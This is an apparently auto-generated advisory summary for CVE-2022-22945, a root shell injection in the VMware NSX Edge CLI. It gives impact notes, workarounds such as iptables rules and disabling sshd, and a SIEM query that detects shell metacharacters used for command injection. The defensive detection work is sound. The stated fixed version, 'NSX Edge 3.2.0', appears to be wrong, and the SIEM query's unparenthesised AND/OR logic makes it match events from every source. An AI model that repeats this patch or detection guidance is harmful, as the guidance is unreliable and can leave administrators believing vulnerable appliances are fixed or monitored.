CVE-2022-22945
📋 TL;DR
CVE-2022-22945 is a CLI shell injection vulnerability in VMware NSX Edge that allows authenticated attackers with SSH access to execute arbitrary commands as root. This affects organizations using vulnerable VMware NSX Edge appliances. Attackers can gain complete control over affected systems.
💻 Affected Systems
- VMware NSX Edge
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of NSX Edge appliance leading to lateral movement, data exfiltration, and disruption of network services across the entire virtual infrastructure.
Likely Case
Attackers with existing SSH access escalate privileges to root and install persistence mechanisms, backdoors, or cryptocurrency miners.
If Mitigated
Limited impact due to restricted SSH access, network segmentation, and proper authentication controls preventing initial access.
🎯 Exploit Status
Exploitation requires SSH credentials. Once authenticated, the shell injection is straightforward to execute.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: NSX Edge 3.2.0 and later
Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2022-0005.html
Restart Required: Yes
Instructions:
1. Download NSX Edge 3.2.0 or later from VMware portal. 2. Deploy the updated appliance. 3. Migrate configuration from old appliance. 4. Decommission vulnerable appliance.
🔧 Temporary Workarounds
Restrict SSH Access
linuxLimit SSH access to NSX Edge appliances to trusted administrative networks only using firewall rules.
# Configure firewall to restrict SSH (example for iptables)
iptables -A INPUT -p tcp --dport 22 -s trusted_ip_range -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j DROP
Disable SSH if Not Required
linuxDisable SSH service on NSX Edge appliances if remote CLI access is not needed for operations.
systemctl stop sshd
systemctl disable sshd
🧯 If You Can't Patch
- Implement strict network segmentation to isolate NSX Edge appliances from untrusted networks.
- Enforce multi-factor authentication and strong password policies for SSH access.
🔍 How to Verify
Check if Vulnerable:
Check NSX Edge version via CLI: 'show version' or web interface. Versions before 3.2.0 are vulnerable.Check Version:
show versionVerify Fix Applied:
Verify version is 3.2.0 or later using 'show version' command.📡 Detection & Monitoring
Log Indicators:
- Unusual SSH login attempts to NSX Edge appliances
- Suspicious CLI commands containing shell metacharacters
- Root privilege escalation events
Network Indicators:
- Unexpected outbound connections from NSX Edge appliances
- SSH brute force attempts against NSX Edge IPs
SIEM Query:
source="nsx-edge" AND (event="ssh_login" OR event="cli_command") AND command="*;*" OR command="*|*" OR command="*`*"